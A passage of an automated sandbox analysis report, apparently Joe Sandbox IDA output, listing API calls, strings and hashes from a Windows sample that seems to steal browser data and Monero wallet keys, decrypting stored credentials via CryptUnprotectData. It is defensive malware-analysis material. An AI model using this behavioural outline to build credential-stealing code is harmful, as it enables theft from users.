                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 4c7e8e8c9cc43461534f60484c5010c2300e6b4544141979f2fcd73867684d8f
                              • Instruction ID: e4a559d326260328cba94768c78df59ef9cef211572e060afd3858c5be9d63b1
                              • Opcode Fuzzy Hash: 4c7e8e8c9cc43461534f60484c5010c2300e6b4544141979f2fcd73867684d8f
                              • Instruction Fuzzy Hash: 89B13571910104EFDB64FF60DC5AFEE7379AF95300F4086A9E40A96151EF386B49CB92
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007B510C,?,?,?,007B51B4,?,?,00000000,?,00000000), ref: 00791923
                              • StrCmpCA.SHLWAPI(?,007B525C), ref: 00791973
                              • StrCmpCA.SHLWAPI(?,007B5304), ref: 00791989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00791D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00791DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00791E20
                              • FindClose.KERNEL32(000000FF), ref: 00791E32
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 8b9fd98e905011341894e37b39347cbb885bf72b34cae3cf9344cc7ed36a9084
                              • Instruction ID: 7c10792631911093e498839e8a8ccbfbcf9b876b2aaf841c12328a9c1825dddb
                              • Opcode Fuzzy Hash: 8b9fd98e905011341894e37b39347cbb885bf72b34cae3cf9344cc7ed36a9084
                              • Instruction Fuzzy Hash: 4C12D071910118EBDB55FB60DC9AAEE7378AF95300F4042A9B50B66091EF3C6F89CF91
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,007B0C2E), ref: 0079DE5E
                              • StrCmpCA.SHLWAPI(?,007B14C8), ref: 0079DEAE
                              • StrCmpCA.SHLWAPI(?,007B14CC), ref: 0079DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0079E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0079E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: d61469850affb31ce20c5d2f79aceeb7bae2b0b0f9e64cea7f5e6e5d040f94f2
                              • Instruction ID: e3b73ad169d914dad1fb19d89d09f6c22bb7ba1730ba15fbcbf00e03951ab981
                              • Opcode Fuzzy Hash: d61469850affb31ce20c5d2f79aceeb7bae2b0b0f9e64cea7f5e6e5d040f94f2
                              • Instruction Fuzzy Hash: E4F19071914118EADB56EB60DC99EEE7378BF55300F8142E9B40B62091EF386F8ACF51
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: CTdo$NC$VI~f$tAw2$uz/$vS^$yT{^$E^g$X=u$nXu
                              • API String ID: 0-1128772954
                              • Opcode ID: 283bf2afbc9dc1c16cd63e5c4fa93799a80d96201af1921f70100a5eada319f8
                              • Instruction ID: 1d93f0b6e3c409f2d07f8c6c0fa6c902cb1896decccd7d147bf2bf90a81e43e2
                              • Opcode Fuzzy Hash: 283bf2afbc9dc1c16cd63e5c4fa93799a80d96201af1921f70100a5eada319f8
                              • Instruction Fuzzy Hash: 20B208F36082049FE3046E2DEC8567AFBEAEFD4720F16893DE6C4C7744EA3558058696
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007B14B0,007B0C2A), ref: 0079DAEB
                              • StrCmpCA.SHLWAPI(?,007B14B4), ref: 0079DB33
                              • StrCmpCA.SHLWAPI(?,007B14B8), ref: 0079DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0079DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0079DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 6ae62084fd43977a1525dcf13c2df5a115d5f83717427289d985749821e965e3
                              • Instruction ID: cae83529da50781e85275c6710a8679939fd6fe848a8cbd7738e3630603acc66
                              • Opcode Fuzzy Hash: 6ae62084fd43977a1525dcf13c2df5a115d5f83717427289d985749821e965e3
                              • Instruction Fuzzy Hash: A7912272910104EBCF54FBB0EC5A9EE737DABC5300F408669B90A96141EF3C9B59CB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: WH_?$o;$oS{$r`Os$tFK'$yqmW$z9~$|-?~$v[
                              • API String ID: 0-3677875943
                              • Opcode ID: 768ee0121bd67e9e9fb6bd3793a3d1b8372ff3f5fb488ebdb1c62d288c9e67a6
                              • Instruction ID: b8ac088121bffd337c2491fb5233365a8dc5c45d8ced326d71baf1ddc0860555
                              • Opcode Fuzzy Hash: 768ee0121bd67e9e9fb6bd3793a3d1b8372ff3f5fb488ebdb1c62d288c9e67a6
                              • Instruction Fuzzy Hash: ADB227F3A0C2049FD3046F2DEC8567AFBE9EF94720F1A893DEAC487744E67558058692
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,007B05AF), ref: 007A7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 007A7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 007A7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 007A7C62
                              • LocalFree.KERNEL32(00000000), ref: 007A7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 0affcf3523fd00684a251073818906307a804e8f701a8f5cad938d0e2bdade82
                              • Instruction ID: 63da20da87416b3bab18ee2e8fbadeaf8df90c790bab966d7a40cd109b91e981
                              • Opcode Fuzzy Hash: 0affcf3523fd00684a251073818906307a804e8f701a8f5cad938d0e2bdade82
                              • Instruction Fuzzy Hash: 0E415E71951218EBCB64DB54DC9DBEEB3B8FF85700F204299E40A62191DB782F85CFA1
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,007B0D73), ref: 0079E4A2
                              • StrCmpCA.SHLWAPI(?,007B14F8), ref: 0079E4F2
                              • StrCmpCA.SHLWAPI(?,007B14FC), ref: 0079E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0079EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: c0312d5736ca6d42223d19014011437c571597c42eaa975b94d477d3d3699340
                              • Instruction ID: 08fbeda870d2f9e001113314a3496416745759965cc46c19c2991f87635b974b
                              • Opcode Fuzzy Hash: c0312d5736ca6d42223d19014011437c571597c42eaa975b94d477d3d3699340
                              • Instruction Fuzzy Hash: 2B122071910118EBDB55FB60DC9AEEE7378AF95300F4042A9B50B96091EF3C6F49CB92
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ny,00000000,00000000), ref: 00799AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00794EEE,00000000,?), ref: 00799B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ny,00000000,00000000), ref: 00799B2A
                              • LocalFree.KERNEL32(?,?,?,?,00794EEE,00000000,?), ref: 00799B3F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID: Ny
                              • API String ID: 4291131564-2735882127
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0079C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0079C87C
                              • lstrcat.KERNEL32(?,007B0B46), ref: 0079C943
                              • lstrcat.KERNEL32(?,007B0B47), ref: 0079C957
                              • lstrcat.KERNEL32(?,007B0B4E), ref: 0079C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 007A696C
                              • sscanf.NTDLL ref: 007A6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007A69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007A69C0
                              • ExitProcess.KERNEL32 ref: 007A69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0079724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00797254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00797281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 007972A4
                              • LocalFree.KERNEL32(?), ref: 007972AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007A961E
                              • Process32First.KERNEL32(007B0ACA,00000128), ref: 007A9632
                              • Process32Next.KERNEL32(007B0ACA,00000128), ref: 007A9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 007A965C
                              • CloseHandle.KERNEL32(007B0ACA), ref: 007A967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .7n$>Y_}$ZwN$b9cw
                              • API String ID: 0-1058704848
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ?07?$o;$o;$xHw;
                              • API String ID: 0-2117633862
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00795184,40000001,00000000,00000000,?,00795184), ref: 007A8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,014CDEA8,00000000,?,007B0E10,00000000,?,00000000,00000000), ref: 007A7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,014CDEA8,00000000,?,007B0E10,00000000,?,00000000,00000000,?), ref: 007A7A7D
                              • wsprintfA.USER32 ref: 007A7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: %:{$%u{$UUr1
                              • API String ID: 0-3479111920
                              • Opcode ID: 19300c639fddba81476684ccc582cc233e9db730973d2fa160b23cbbf565924a
                              • Instruction ID: ac5db84be3f1116fdaa99d5229570b878af97c90c001b1f493f48911b4962cb3
                              • Opcode Fuzzy Hash: 19300c639fddba81476684ccc582cc233e9db730973d2fa160b23cbbf565924a
                              • Instruction Fuzzy Hash: 8DB215F3A0C6009FD304AE2DEC8567AFBE5EF94720F1A492DEAC4C7744EA3558018697
                              APIs
                              • CoCreateInstance.COMBASE(007AE118,00000000,00000001,007AE108,00000000), ref: 007A3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 007A37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 2d2a13172cd4cefb56ecefa98beaacf3919802adba1984659d653ecd45c82c4e
                              • Instruction ID: 988228fae928aababa5045e20ebd0a29ae38a51509675d52d2370718cf58c07e
                              • Opcode Fuzzy Hash: 2d2a13172cd4cefb56ecefa98beaacf3919802adba1984659d653ecd45c82c4e
                              • Instruction Fuzzy Hash: D641F770A40A289FDB24DF58CC99B9BB7B4BB49702F4042D8F608A7290D7756EC5CF50
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00799B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00799BA3
                              • LocalFree.KERNEL32(?), ref: 00799BD3
                              Memory Dump Source
